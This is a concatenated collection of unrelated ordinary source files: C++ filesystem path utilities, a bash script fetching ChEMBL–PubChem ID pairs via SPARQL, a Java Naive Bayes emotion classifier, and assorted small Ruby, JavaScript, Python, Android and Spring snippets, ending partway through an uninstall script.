// platform (PATH_MAX is the usual Linux constant) — confirm.
string path::abspath(string filename)
{
    path::format(filename);
#ifdef __linux__
    char absolute_path[MAX_PATH+1];
    // realpath returns NULL on failure (e.g. nonexistent file); fall back to
    // the formatted input instead of reading an uninitialised buffer.
    if(realpath(filename.c_str(), absolute_path) == NULL)
    {
        return filename;
    }
    // Bug fix: this branch previously did `return result;` with `result`
    // never declared, so it did not compile on Linux.
    string result = absolute_path;
    format(result);
    return result;
#else
#ifdef USE_QT
    return QFileInfo(QString::fromStdString(filename)).absoluteFilePath().toStdString();
#else
    char absolute_path[MAX_PATH+1];
    GetFullPathName(filename.c_str(), MAX_PATH, absolute_path, NULL);
    string result = absolute_path;
    format(result);
    return result;
#endif
#endif
}
// Compute the path of filename relative to basepath. Falls back to the
// absolute filename when the two paths share no root (e.g. different drives).
string path::relpath(string filename, string basepath)
{
    filename = path::abspath(filename);
    basepath = path::abspath(basepath);
    // Different first character (e.g. different drive letter): no relative form.
    if(filename[0] != basepath[0])
    {
        return filename;
    }
    // Find the first index at which the two absolute paths diverge.
    int min_size = min(filename.size(), basepath.size());
    int pos_not_equal = min_size;
    for(int i = 0; i < min_size; i++)
    {
        if(filename[i] != basepath[i])
        {
            pos_not_equal = i;
            break;
        }
    }
    // Emit one "../" for every basepath component below the common prefix.
    string result = "";
    int pos = basepath.size()-1;
    while(pos >= 0 && pos >= pos_not_equal)
    {
        result += "../";
        while(pos >= 0 && pos >= pos_not_equal && basepath[pos] != '/')
        {
            pos--;
        }
        pos--;
    }
    // Back up to the start of the first diverging filename component.
    pos++;
    while(pos >= 0 && (size_t)pos < filename.size() && filename[pos] != '/')
    {
        pos--;
    }
    result += filename.substr(pos+1);
    path::format(result);
    return result;
}
// Return the final component of filename ("" when it ends with a separator,
// the whole string when it contains none).
// Bug fix: the old code computed `find_last_of(...) + 1` first, so the
// subsequent npos comparison could never be true (npos + 1 wraps to 0) and
// the "no separator" branch was dead; the right answer emerged by accident.
string path::basename(const string& filename)
{
    const size_t slash_pos = filename.find_last_of("/\\");
    if(slash_pos == string::npos)
    {
        return filename;
    }
    // substr(size()) yields "" for a trailing separator, as before.
    return filename.substr(slash_pos + 1);
}
// Return everything before the last path separator, or "." when there is none.
// Fixed the size_t -> int narrowing of find_last_of's result: the previous
// code relied on npos surviving a round-trip through int to compare equal.
string path::dirname(const string& full_name)
{
    const size_t end_pos = full_name.find_last_of("/\\");
    if(end_pos == string::npos)
    {
        return ".";
    }
    return full_name.substr(0, end_pos);
}
// Return the extension of full_name without the dot, or "" when there is
// none (no dot, dot in a directory component, or a trailing dot).
// Rewritten with size_t positions: the old int comparisons only worked
// because npos happened to narrow to -1.
string path::extname(const string& full_name)
{
    const size_t pos_point = full_name.find_last_of('.');
    if(pos_point == string::npos || pos_point == full_name.size() - 1)
    {
        return "";
    }
    const size_t pos_slash = full_name.find_last_of("/\\");
    // A separator after the last dot means the dot is not part of the name.
    if(pos_slash != string::npos && pos_slash > pos_point)
    {
        return "";
    }
    return full_name.substr(pos_point + 1);
}
// Copy filename into dir_name (created if missing), keeping its base name.
// Returns 0 on success, 1 if the destination already exists, -1 on mkdir failure.
int copy_file_to_dir(const string& filename, const string& dir_name)
{
    if(-1 == path::mkdir(dir_name))
    {
        return -1;
    }
    if(path::isfile(dir_name + "/" + path::basename(filename)))
    {
        return 1;
    }
    ifstream ifile(filename.c_str(), ios::binary);
    ofstream ofile((dir_name + "/" + path::basename(filename)).c_str(), ios::binary);
    // NOTE(review): a missing or unreadable source is not detected here and
    // silently produces an empty destination file — confirm intended.
    ofile << ifile.rdbuf();
    ifile.close();
    ofile.close();
    return 0;
}
// Copy src_filename to the exact path dest_filename, creating parent
// directories as needed. Returns 0 on success, 1 if the destination already
// exists, -1 when the parent directory cannot be created.
int copy_file_to_file(const string& src_filename, const string& dest_filename)
{
    if(-1 == path::mkdir(path::dirname(dest_filename)))
    {
        return -1;
    }
    if(path::isfile(dest_filename))
    {
        return 1;
    }
    ifstream ifile(src_filename.c_str(), ios::binary);
    ofstream ofile(dest_filename.c_str(), ios::binary);
    // NOTE(review): a missing or unreadable source is not detected here and
    // silently produces an empty destination file — confirm intended.
    ofile << ifile.rdbuf();
    ifile.close();
    ofile.close();
    return 0;
}
int in_str(const string& target, char pattern)
{
int n = target.size();
for(int i = 0; i < n; i++)
{
if(target[i] == pattern)
{
return i;
}
}
return -1;
}
// Copy a file or directory tree from src to dest, mimicking `cp -r`.
// Returns 0 on success, 1 when src == dest, -1 on error (missing src, or
// dest is an existing file).
int path::cp(string src, string dest)
{
    format(src);
    format(dest);
    if(!exists(src) || isfile(dest))
    {
        return -1;
    }
    if(dest == src)
    {
        return 1;
    }
    if(src[src.size()-1] == '/')
    {
        src.erase(src.end()-1);
    }
    string name = path::basename(dest);
    if(isfile(src))
    {
        // Decide whether dest names a directory or a target file:
        // a trailing slash always means "copy into this directory".
        if(dest[dest.size()-1] == '/')
        {
            return copy_file_to_dir(src, dest);
        }
        else if((isdir(path::dirname(dest)) && !isdir(dest)) || in_str(name, '.') > 0)
        {
            // dest looks like a file path (existing parent, or name has an extension)
            return copy_file_to_file(src, dest);
        }
        else
        {
            return copy_file_to_dir(src, dest);
        }
    }
    else
    {
        // src is a directory: copy it (recursively) into/as dest.
        if(exists(dest))
        {
            dest = dest + "/" + path::basename(src);
        }
        vector<string> files = ls(src);
        if(-1 == mkdir(dest))
        {
            return -1;
        }
        for(auto it = files.begin(); it != files.end(); it++)
        {
            cp(*it, dest);
        }
    }
    return 0;
}
// Move `src` to `dest`, implemented as copy-then-remove.
// Returns 1 when src and dest are the same path (nothing to do),
// otherwise the result of the underlying copy.
int path::mv(string src, string dest)
{
    format(src);
    format(dest);
    if(dest == src)
    {
        return 1;
    }
    // Remove the source only after attempting the copy; the copy's
    // status is what callers see.
    int result = cp(src, dest);
    rm(src);
    return result;
}
// Rename `src` (file or directory) to the bare name `dest` within src's
// own directory. Returns 0 on success, 1 when the name is already `dest`,
// -1 on invalid input (missing src, slash in dest, or name collision);
// otherwise forwards ::rename's return value.
int path::rename(string src, string dest)
{
    format(src);
    // Strip a trailing slash from a directory path.
    if(src[src.size() - 1] == '/')
    {
        src.erase(src.size() - 1, 1);
    }
    if(path::basename(src) == dest)
    {
        return 1;
    }
    bool invalid = !exists(src)
        || in_str(dest, '/') != -1
        || exists(path::dirname(src) + "/" + dest);
    if(invalid)
    {
        return -1;
    }
    return ::rename(src.c_str(), (path::dirname(src) + "/" + dest).c_str());
}
// Create an empty file (and any missing parent directories).
// Returns 0 on creation, 1 if the file already exists, -1 on failure
// (name taken by a directory, mkdir failed, or file creation failed).
int path::touch(string filename)
{
    format(filename);
    if(isfile(filename))
    {
        return 1;
    }
    if(isdir(filename))
    {
        return -1;
    }
    if(-1 == mkdir(path::dirname(filename)))
    {
        return -1;
    }
    ofstream ofile(filename, ios::binary);
    if(!ofile)
    {
        // Previously reported success even when the open failed
        // (e.g. permission denied).
        return -1;
    }
    return 0;
}
// Read the whole of `filename` and return its contents as a string
// ("" when the file cannot be opened).
string path::cat(string filename)
{
    ifstream input(filename.c_str());
    stringstream contents;
    contents << input.rdbuf();
    return contents.str();
}
|
#!/bin/bash
# NOTE: bash shebang — 'set -o pipefail' is not guaranteed under POSIX /usr/bin/sh.
set -euo pipefail
# Fetch pairs of PubChem IDs and ChEMBL IDs from the Integbio SPARQL endpoint.
ENDPOINT=https://integbio.jp/rdf/ebi/sparql
WORKDIR=chembl2pubchem   # temporary directory holding the per-chunk ID-pair files
LIMIT=1000000            # maximum number of rows the SPARQL endpoint returns per query
CURL=/usr/bin/curl
# Template of the query fetching ChEMBL/PubChem ID pairs. More than one
# million rows exist, so OFFSET/LIMIT clauses are appended with sed below.
CHEMBL_PUBCHEM_QUERY_FILE=query_01.rq
# Template of the query counting the total number of rows of the query above.
COUNT_CHEMBL_PUBCHEM_QUERY_FILE=query_01_count.rq
if [ ! -e "$CHEMBL_PUBCHEM_QUERY_FILE" ]; then echo "必要なファイルが不足しています。:$CHEMBL_PUBCHEM_QUERY_FILE"; exit 1; fi
if [ ! -e "$COUNT_CHEMBL_PUBCHEM_QUERY_FILE" ]; then echo "必要なファイルが不足しています。:$COUNT_CHEMBL_PUBCHEM_QUERY_FILE"; exit 1; fi
if [ ! -e "$WORKDIR" ]; then
    mkdir "$WORKDIR"
else
    rm -f "${WORKDIR}"/*
fi
C2P_TOTAL=$($CURL -sSH "Accept: text/csv" --data-urlencode query@"$COUNT_CHEMBL_PUBCHEM_QUERY_FILE" "$ENDPOINT" | tail -1)
#echo 取得対象C2P数: $C2P_TOTAL
# Use $((...)) instead of expr: under 'set -e', 'expr' exits non-zero when the
# result is 0 (i.e. fewer than LIMIT rows) and would abort the whole script.
COUNT=$(( C2P_TOTAL / LIMIT ))
for i in $(seq 0 "${COUNT}"); do
    # OFFSET is computed as i * LIMIT (the original string-appended six zeros,
    # which silently broke if LIMIT were ever changed).
    QUERY=$(sed -e "$ a OFFSET $(( i * LIMIT )) LIMIT ${LIMIT}" "$CHEMBL_PUBCHEM_QUERY_FILE")
    $CURL -o "${WORKDIR}/${i}.txt" -sSH "Accept: text/tab-separated-values" --data-urlencode query="$QUERY" "$ENDPOINT"
done
# Re-query failed chunks until none remain. A chunk is considered failed when
# its first line does not start with "chembl_id".
ERROR_FILES=$(find "${WORKDIR}" -type f -exec sh -c '(head -1 {} | grep -m 1 -q "^\"chembl_id\"") || basename {} .txt' \;)
while true; do
    if [ -n "$ERROR_FILES" ]; then
        for i in $ERROR_FILES; do
            QUERY=$(sed -e "$ a OFFSET $(( i * LIMIT )) LIMIT ${LIMIT}" "$CHEMBL_PUBCHEM_QUERY_FILE")
            $CURL -o "${WORKDIR}/${i}.txt" -sSH "Accept: text/tab-separated-values" --data-urlencode query="$QUERY" "$ENDPOINT"
        done
        ERROR_FILES=$(for f in $ERROR_FILES; do echo "${WORKDIR}/${f}.txt"; done | xargs -i sh -c '(head -1 {} | grep -m 1 -q "^\"chembl_id\"") || basename {} .txt')
        sleep 5
    else
        break
    fi
done
# Emit all pairs to stdout: strip the per-chunk header lines and the quotes.
tail -qn +2 "${WORKDIR}"/*.txt | sed -e 's/"//g'
|
<reponame>atrilla/emolib<filename>src/emolib/classifier/machinelearning/MultinomialNB.java
/*
* File : MultinomialNB.java
* Created : 25-Jul-2011
* By : atrilla
*
* Emolib - Emotional Library
*
* Copyright (c) 2011 <NAME> &
* 2007-2012 Enginyeria i Arquitectura La Salle (Universitat Ramon Llull)
*
* This file is part of Emolib.
*
* You should have received a copy of the rights granted with this
* distribution of EmoLib. See COPYING.
*/
package emolib.classifier.machinelearning;
import emolib.classifier.Classifier;
import emolib.classifier.FeatureBox;
import emolib.classifier.machinelearning.ARNReduced.Graph;
import emolib.classifier.machinelearning.ARNReduced.GraphElement;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.HashMap;
import java.lang.Math;
/**
 * The <i>MultinomialNB</i> class is a Multinomial Naive
 * Bayes (MNB) classifier.
 *
 * <p>
 * It is a probabilistic generative approach
 * that builds a language model assuming
 * conditional independence among the features. In reality, this
 * conditional independence assumption does not hold for text
 * data, but even though the probability estimates of this
 * oversimplified model are of low quality because of this, its
 * classification decisions (based on Bayes' decision rule) are
 * surprisingly good. The MNB combines efficiency (it has
 * an optimal time performance) with good accuracy.
 * </p>
 * <p>
 * The MultinomialNB follows the implementation described in (Manning, et al.,
 * 2008).
 * The same term weighting schemes as the ones used in the ARN-R are
 * considered.
 * </p>
 * <p>
 * --<br>
 * (Manning, et al., 2008) <NAME>., <NAME>. and
 * <NAME>., "An Introduction to Information Retrieval", 2008.
 * </p>
 *
 * @see emolib.classifier.machinelearning.ARNReduced
 *
 * @author <NAME> (<EMAIL>)
 */
public class MultinomialNB extends Classifier {

    // Core model state.
    // condprob(t|c): one list of per-term conditional probabilities per category.
    private ArrayList<ArrayList<Double>> theProbs;
    // prior(c): one prior probability per category.
    private ArrayList<Double> thePriors;

    // Term Weighting scheme core: the ARN-R performs tokenisation,
    // term weighting and graph construction for this classifier.
    private ARNReduced arnR;
    private boolean bigramFreq;
    private boolean posTags;
    private boolean stemming;
    private boolean synonyms;
    private boolean emotionDims;
    private boolean negation;
    // Feature-selection flags (mutually configurable) and the number of
    // features to retain.
    private boolean mutualInformation;
    private boolean chiSquare;
    private boolean termFreq;
    private int numFeatSel;
    // Per-category term graphs and the global vocabulary graph, both
    // produced by the trained ARN-R.
    private ArrayList<Graph> categoryGraph;
    private Graph vocabularyGraph;

    /**
     * Default constructor: all model state empty, all weighting and
     * feature-selection options disabled.
     */
    public MultinomialNB() {
        theProbs = null;
        thePriors = null;
        arnR = null;
        categoryGraph = null;
        bigramFreq = false;
        posTags = false;
        stemming = false;
        synonyms = false;
        emotionDims = false;
        negation = false;
        mutualInformation = false;
        chiSquare = false;
        termFreq = false;
        numFeatSel = 0;
    }

    /* (non-Javadoc)
     * @see emolib.classifier.Classifier#getCategory(emolib.classifier.
     * FeatureBox)
     *
     * APPLY MULTINOMIALNB (C, V, prior, condprob, d) from
     * (Manning, et al., 2008): score each category by log prior plus the
     * term-frequency-weighted log conditional probabilities of the document's
     * terms, and return the arg-max category.
     */
    public String getCategory(FeatureBox inputFeatures) {
        int maxCat = 0;
        double maxScore = 0;
        boolean first = true;
        // 1) W <- EXTRACT TOKENS FROM DOC (V, d)
        Graph W = arnR.buildGraph(inputFeatures);
        // 2) for each category c in C
        double score = 0;
        for (int c = 0; c < categoryGraph.size(); c++) {
            // 3) score(c) <- log prior(c)
            score = Math.log(thePriors.get(c).doubleValue());
            // 4) for each term t in the vocabulary
            for (int t = 0; t < vocabularyGraph.getNumberOfElements(); t++) {
                // 5) score(c) += tf(t, d) * log condprob(t|c)
                if (W.containsElement(vocabularyGraph.getElement(t))) {
                    score += Math.log(theProbs.get(c).get(t).doubleValue()) *
                        (double)W.getElementTermFrequency(
                        vocabularyGraph.getElement(t));
                }
            }
            // Track the best-scoring category so far (arg max over C).
            if (first) {
                maxCat = 0; // again
                maxScore = score;
                first = false;
            } else {
                if (score > maxScore) {
                    maxScore = score;
                    maxCat = c;
                }
            }
        }
        return categoryGraph.get(maxCat).getCategoryName();
    }

    /**
     * Training method based on the algorithm in (Manning, et al.,
     * 2008).
     * Nevertheless, doc counts are approximated by the sum of term freqs.
     *
     * (non-Javadoc)
     * @see emolib.classifier.Classifier#trainingProcedure()
     */
    public void trainingProcedure() {
        ArrayList<FeatureBox> exampleFeatures = getListOfExampleFeatures();
        ArrayList<String> exampleCategories = getListOfExampleCategories();
        arnR = new ARNReduced();
        setFeatureWeights();
        // Feed every (features, category) training example to the ARN-R.
        Iterator exFeat = exampleFeatures.iterator();
        Iterator exCat = exampleCategories.iterator();
        while (exFeat.hasNext() && exCat.hasNext()) {
            arnR.inputTrainingExample((FeatureBox)exFeat.next(),
                (String)exCat.next());
        }
        // TRAIN MULTINOMIALNB (C, D) from (Manning, et al., 2008).
        arnR.train();
        categoryGraph = arnR.getCategoryGraphs();
        theProbs = new ArrayList<ArrayList<Double>>();
        thePriors = new ArrayList<Double>();
        // 1) V <- EXTRACT VOCABULARY (D)
        vocabularyGraph = arnR.getVocabularyGraph();
        // 2) N <- COUNT DOCS (D) -- approximated by summed term frequencies.
        double N = 0;
        for (int c = 0; c < categoryGraph.size(); c++) {
            N += (double)categoryGraph.get(c).getTotalSumTF();
        }
        double Nc = 0;
        double Tct = 0;
        ArrayList<Double> pVocab = null;
        // 3) for each category c in C
        for (int c = 0; c < categoryGraph.size(); c++) {
            // 4) Nc <- COUNT DOCS IN CLASS (D, c) -- same approximation.
            Nc = (double)categoryGraph.get(c).getTotalSumTF();
            // 5) prior(c) <- Nc / N
            thePriors.add(new Double((double)Nc / (double)N));
            // 6) textc <- CONCATENATE TEXT OF ALL DOCS IN CLASS (D, c)
            // Done implicitly by the per-category graphs.
            // 7) for each term t in V
            pVocab = new ArrayList<Double>();
            for (int t = 0; t < vocabularyGraph.getNumberOfElements(); t++) {
                // 8) Tct <- COUNT TOKENS OF TERM (textc, t)
                Tct = (double)categoryGraph.get(c).
                    getElementTermFrequency(vocabularyGraph.getElement(t));
                // 9 and 10) condprob(t|c) with add-one (Laplace) smoothing.
                pVocab.add(new Double((double)(Tct + 1) / (double)(Nc +
                    vocabularyGraph.getNumberOfElements())));
            }
            theProbs.add(pVocab);
        }
        // 11) return V, prior, condprob -- kept in the fields above.
    }

    /**
     * Forwards the configured term-weighting and feature-selection options
     * to the underlying ARN-R. Requires {@code arnR} to be initialised.
     *
     * NOTE(review): {@code emotionDims} and {@code negation} are stored by
     * their setters but never forwarded here — confirm whether ARNReduced
     * supports them.
     */
    private void setFeatureWeights() {
        arnR.setCOF(bigramFreq);
        arnR.setPOS(posTags);
        arnR.setStems(stemming);
        arnR.setSynonyms(synonyms);
        arnR.setFeatSelMI(mutualInformation, numFeatSel);
        arnR.setFeatSelChi2(chiSquare, numFeatSel);
        arnR.setFeatSelTF(termFreq, numFeatSel);
    }

    /**
     * Set the Mutual Information feature selection.
     *
     * @param mi The Mutual Information flag.
     * @param numF The number of relevant features desired.
     */
    public void setMI(boolean mi, int numF) {
        mutualInformation = mi;
        numFeatSel = numF;
    }

    /**
     * Set the Chi square feature selection.
     *
     * @param chi The Chi2 flag.
     * @param numF The number of relevant features desired.
     */
    public void setChi2(boolean chi, int numF) {
        chiSquare = chi;
        numFeatSel = numF;
    }

    /**
     * Set the Term Frequency feature selection.
     *
     * @param tf The Term Frequency flag.
     * @param numF The number of relevant features desired.
     */
    public void setTF(boolean tf, int numF) {
        termFreq = tf;
        numFeatSel = numF;
    }

    /**
     * Method to consider bigram frequencies.
     *
     * @param cof The COF flag.
     */
    public void setCOF(boolean cof) {
        bigramFreq = cof;
    }

    /**
     * Method to consider POS tags.
     *
     * @param pos The POS flag.
     */
    public void setPOS(boolean pos) {
        posTags = pos;
    }

    /**
     * Method to consider stems.
     *
     * @param stems The stemming flag.
     */
    public void setStemming(boolean stems) {
        stemming = stems;
    }

    /**
     * Method to consider synonyms.
     *
     * @param syns The synonyms flag.
     */
    public void setSynonyms(boolean syns) {
        synonyms = syns;
    }

    /**
     * Method to consider emotion dimensions.
     *
     * @param emodims The emotion dimensions flag.
     */
    public void setEmotionDims(boolean emodims) {
        emotionDims = emodims;
    }

    /**
     * Method to consider negations.
     *
     * @param neg The negation flag.
     */
    public void setNegation(boolean neg) {
        negation = neg;
    }

    /* (non-Javadoc)
     * @see emolib.classifier.Classifier#save(java.lang.String)
     * NOTE(review): persistence is not implemented — saving is a no-op.
     */
    public void save(String path) {
    }

    /* (non-Javadoc)
     * @see emolib.classifier.Classifier#load(java.lang.String)
     * NOTE(review): persistence is not implemented — loading is a no-op.
     */
    public void load(String path) {
    }

    /* (non-Javadoc)
     * @see emolib.classifier.Classifier#resetExamples()
     * Also drops the trained model so a stale model cannot be applied
     * after the examples are cleared.
     */
    @Override
    public void resetExamples() {
        super.resetExamples();
        theProbs = null;
        thePriors = null;
        arnR = null;
    }
}
|
<reponame>lukaselmer/find_and_restore_big_files
# Tracks which file paths and which file contents (by hash) have already
# been seen, backed by a repository object that supplies path/hash
# generation.
class ResultTracker
  def initialize(repo)
    @repo = repo
    @paths = repo.generate_paths
    @hashes = repo.generate_hashes
  end

  # True if the file's path is already tracked.
  def path_exists?(file)
    @paths.include?(file.path)
  end

  # Record the file's path and content hash (no duplicates).
  def store(file)
    hash = @repo.generate_hash(file.path)
    @hashes << hash unless @hashes.include?(hash)
    @paths << file.path unless @paths.include?(file.path)
  end

  # True if a file with identical content has been seen.
  def content_exists?(file)
    # Hash the file once instead of once per stored hash (the original
    # re-ran generate_hash inside the any? loop).
    # TODO (from original): use a similarity-preserving hash so files that
    # are at least ~90% similar compare as equal.
    @hashes.include?(@repo.generate_hash(file.path))
  end
end
|
# Locate the project root two directories above the running executable
# (this_exe_path is set earlier by the caller), then the solver binaries.
proj_path=$(dirname $(dirname "${this_exe_path}"))
classify_exe="${proj_path}/bld/uni/classify"
gen_exe="${proj_path}/bld/uni/generate"
xlate_exe="${proj_path}/bld/uni/xlate"
# Print the smallest domain size d >= 2 such that d^3 is at least the
# number of bytes in the first argument.
function calc_domsz()
{
    local d nbytes
    d=2
    nbytes=$(printf '%s' "$1" | wc -c)
    while [ $(($d * $d * $d)) -lt $nbytes ]
    do
        d=$(($d + 1))
    done
    printf '%s' $d
}
|
#!/bin/bash
# For every SCITE maximum-likelihood tree (*ml0.gv), extract m and n from the
# file name (m<m>_n<n>_s<s>_k<k>_loss<f>_a<f>_b<f>...) and convert the tree
# with processSCITE.py, writing the result next to the input as *.A.
for f in flip_SCITE/*ml0.gv
do
    g=$(basename "$f")
    # Single shared capture pattern; \1 = m, \2 = n (the original duplicated
    # the whole regex for each field).
    pattern='s/^m\([0-9]*\)_n\([0-9]*\)_s\([0-9]*\)_k\([0-9]*\)_loss\(0\.[0-9]*\)_a\(0\.[0-9]*\)_b\(0\.[0-9]*\).*/'
    m=$(echo "$g" | sed -e "${pattern}\1/g")
    n=$(echo "$g" | sed -e "${pattern}\2/g")
    python processSCITE.py "$f" "$m" "$n" > "$(dirname "$f")/$(basename "$f" _ml0.gv).A"
done
|
<filename>mc-commons/mc-common-core/src/main/java/com/mc/common/constant/ServiceNameConstants.java<gh_stars>1-10
package com.mc.common.constant;
/**
 * [ServiceNameConstants: service-name constants]
 *
 * Registry names of the downstream microservices this module calls.
 *
 * @author likai
 * @version 1.0
 * @date 2019/12/10 0010 18:19
 * @company Gainet
 * @copyright copyright (c) 2019
 */
public interface ServiceNameConstants {
    /**
     * User/permission service.
     */
    String USER_SERVICE = "user-center";
    /**
     * Search-center service.
     */
    String SEARCH_SERVICE = "search-center";
}
|
#include <iostream>
using namespace std;
// Print the four entries of a 2x2 matrix in reverse row-major order,
// each followed by a single space (e.g. {{2,3},{4,5}} -> "5 4 3 2 ").
void reverse(int a[][2])
{
    for (int row = 2; row-- > 0;)
    {
        for (int col = 2; col-- > 0;)
        {
            cout << a[row][col] << " ";
        }
    }
}
int main()
{
    // Demo: print a sample 2x2 matrix in reverse order.
    int sample[2][2] = {{2, 3}, {4, 5}};
    reverse(sample);
    return 0;
}
<gh_stars>0
var signup = document.getElementById('signup');
var main = document.getElementById('main');
var children = main.children;

// Show only the signup form: reveal direct children of #main whose class
// attribute is exactly 'signup' and hide all the others.
// Fix: removed the leftover debug alert(children.length) and the unused
// 'selected' variable.
function sign() {
    for (var child of children) {
        if (child.getAttribute('class') === 'signup') {
            child.style.display = 'block';
        } else {
            child.style.display = 'none';
        }
    }
}

signup.onclick = sign;
|
<reponame>zhangyut/wolf
package com.bn.box2d.sndls;
import static com.bn.box2d.sndls.Constant.*;
import android.graphics.Canvas;
import android.graphics.Matrix;
import android.graphics.Paint;
public class Pijin
{
public static float[][] lcon=
{
{54,20},
{93,20}
};
float lx;
float ly;
float dx;
float dy;
static boolean flag=false;
public Pijin(float lx,float ly,float dx,float dy)
{
this.lx=lx;
this.ly=ly;
this.dx=dx;
this.dy=dy;
}
public float[] getDegrees(float arg0,float arg1,float arg2,float arg3)
{
float[] degrees=new float[2];
float yoffset=arg3-arg1;
float xoffset=arg2-arg0;
degrees[0]=(float) Math.sqrt(xoffset*xoffset+yoffset*yoffset);
degrees[1]=(float) Math.toDegrees(Math.asin(yoffset/degrees[0]));
return degrees;
}
public void drawSelf(Canvas canvas,Paint paint)
{
if(lx<150*yMainRatio&&!flag)
{
float[] degrees=getDegrees(lx,ly,dx,dy);
setMatrix(canvas,paint,degrees);
}
else
{
flag=true;
float[] degrees=getDegrees(lx,ly,dx,dy);
setMatrix(canvas,paint,degrees);
}
}
public void setMatrix(Canvas canvas,Paint paint,float[] degrees)
{
canvas.save();
Matrix m1=new Matrix();
m1.setTranslate(lx+PIC_ARRAY[1].getWidth(), ly+PIC_ARRAY[1].getHeight()/2);
Matrix m2=new Matrix();
m2.setRotate(degrees[1]);
Matrix m3=new Matrix();
m3.setConcat(m1, m2);
Matrix m4=new Matrix();
float xrotate=(float) (degrees[0])/PIC_ARRAY[24].getWidth();
m4.setScale(xrotate, 1);
Matrix m5=new Matrix();
m5.setConcat(m3, m4);
canvas.drawBitmap(PIC_ARRAY[24], m5, paint);
canvas.restore();
}
} |
<filename>src/materials/Light.hpp
#ifndef LIGHT_H
#define LIGHT_H
#include <memory>
#include "../Vector3.hpp"
#include "../Material.hpp"
#include "../Texture.hpp"
// Emissive (light-source) material: constructed from a texture or a solid
// colour, it reports its radiance via emitted() instead of scattering rays.
class Light : public Material
{
public:
    Light(std::shared_ptr<Texture> a);
    Light(Color3 c);
    // Material interface. NOTE(review): implementation lives in Light.cpp;
    // presumably scatter() returns false for a pure emitter — confirm there.
    virtual bool scatter(const Ray &r_in, const HitRecord &rec, Color3 &attenuation, Ray &scattered) const override;
    // Emitted radiance at surface coordinates (u, v) and hit point p.
    virtual Color3 emitted(float u, float v, const Vector3 &p) const;
private:
    std::shared_ptr<Texture> _emit;   // texture sampled for emission
};
#endif
# Package the hadoop-project-dist build output. Abort if the target
# directory is absent instead of tarring from the wrong directory.
cd "/Users/gggyu/Documents/git/Reading-Hadoop/hadoop-project-dist/target" || exit 1
tar cf - hadoop-project-dist-2.6.0 | gzip > hadoop-project-dist-2.6.0.tar.gz
#!/bin/bash
# Run the taxi example's test suite. Abort if the directory is missing
# instead of running mvn from the wrong place.
cd examples/taxi || exit 1
mvn test
|
package com.banana.volunteer.service.Impl;
import com.banana.volunteer.entity.Branch;
import com.banana.volunteer.entity.Organization;
import com.banana.volunteer.enums.ResultEnum;
import com.banana.volunteer.exception.BusinessException;
import com.banana.volunteer.repository.BranchRepository;
import com.banana.volunteer.repository.OrganizationRepository;
import com.banana.volunteer.service.OrganizationService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class OrganizationServiceImpl implements OrganizationService {

    @Autowired
    private OrganizationRepository orgRepository;

    @Autowired
    private BranchRepository braRepository;

    /**
     * Resolve the name of the organization that owns the given branch.
     * Fix: returns null when the branch or its organization is missing,
     * consistent with every sibling lookup below (previously this threw a
     * NullPointerException).
     */
    @Override
    public String findOrgNameByBranchId(Integer branchId) {
        Branch branch = braRepository.findByBranchId(branchId);
        if (branch == null) {
            return null;
        }
        Organization organization = orgRepository.findByOrgId(branch.getOrgId());
        if (organization == null) {
            return null;
        }
        return organization.getOrgName();
    }

    @Override
    public List<Organization> findAllOrg() {
        return orgRepository.findAll();
    }

    @Override
    public List<Branch> findAllBranchByOrgId(Integer orgId) {
        return braRepository.findAllByOrgId(orgId);
    }

    /** Owning organization id for a branch, or null when the branch is unknown. */
    @Override
    public Integer findOrgIdByBranchId(Integer branchId) {
        Branch branch = braRepository.findByBranchId(branchId);
        if (branch == null) {
            return null;
        }
        return branch.getOrgId();
    }

    /** Organization id by (exact) name, or null when unknown. */
    @Override
    public Integer findOrgIdByOrgName(String orgName) {
        Organization organization = orgRepository.findByOrgName(orgName);
        if (organization == null) {
            return null;
        }
        return organization.getOrgId();
    }

    /** Organization name by id, or null when unknown. */
    @Override
    public String findOrgNameByOrgId(Integer orgId) {
        Organization organization = orgRepository.findByOrgId(orgId);
        if (organization == null) {
            return null;
        }
        return organization.getOrgName();
    }

    /** Branch name by id, or null when unknown. */
    @Override
    public String findBranchNameByBranchId(Integer branchId) {
        Branch branch = braRepository.findByBranchId(branchId);
        if (branch == null) {
            return null;
        }
        return branch.getBranchName();
    }

    @Override
    public void deleteOrgByOrgId(Integer orgId) {
        orgRepository.deleteById(orgId);
    }

    @Override
    public Organization updateOrg(Organization organization) {
        return orgRepository.saveAndFlush(organization);
    }

    /**
     * Create a new organization; rejects duplicate ids.
     * NOTE(review): the exists-then-save pair is not atomic — a concurrent
     * insert between the check and the save can still slip through.
     */
    @Override
    public Organization createOrg(Organization organization) {
        if (!orgRepository.findById(organization.getOrgId()).isPresent()) {
            return orgRepository.saveAndFlush(organization);
        } else {
            throw new BusinessException(ResultEnum.ID_DUPLICATE);
        }
    }

    @Override
    public List<Branch> findAllBranch() {
        return braRepository.findAll();
    }

    @Override
    public void deleteBranchByBranchId(Integer branchId) {
        braRepository.deleteById(branchId);
    }

    /** Create a new branch; rejects duplicate ids (same race caveat as createOrg). */
    @Override
    public Branch createBranch(Branch branch) {
        if (!braRepository.findById(branch.getBranchId()).isPresent()) {
            return braRepository.saveAndFlush(branch);
        } else {
            throw new BusinessException(ResultEnum.ID_DUPLICATE);
        }
    }

    @Override
    public Branch updateBranch(Branch branch) {
        return braRepository.saveAndFlush(branch);
    }
}
|
# Load the Intel Cluster Toolkit 3.2.0 environment into the current shell
# (sourced, not executed, so the exported variables persist).
. /opt/intel/ictce/3.2.0.020/ictvars.sh
|
def findMissingElement(array):
    """Return the one missing number from a list of 1..n+1 with one absent.

    For an input of length n, the full sequence would be 1..n+1; the result
    is the expected total minus the actual sum.

    Fix: use integer (floor) division so the result is an int — the original
    ``/2`` produced a float (e.g. 5.0 instead of 5) under Python 3.
    """
    n = len(array)
    total = (n + 1) * (n + 2) // 2
    return total - sum(array)
# Driver code: the sequence 1..8 with 5 removed; expected output
# "Missing element is 5".
array = [1, 2, 3, 4, 6, 7, 8]
print("Missing element is",
      findMissingElement(array))
#!/bin/sh
# This shell script removes NFTP binaries and support files
# NOTE(review): the script uses `echo -n`, which is not portable under
# POSIX /bin/sh (dash prints the literal "-n"); works under bash/most BSD sh.
# look up installation: root removes the system-wide install, non-root the
# per-user install under $HOME.
IS_ROOT=`id | grep "uid=0(root)" | wc -l`
if [ $IS_ROOT -eq 1 ]
then
    if [ -d /usr/lib/nftp ]
    then
        TARGETBIN="/usr/bin"
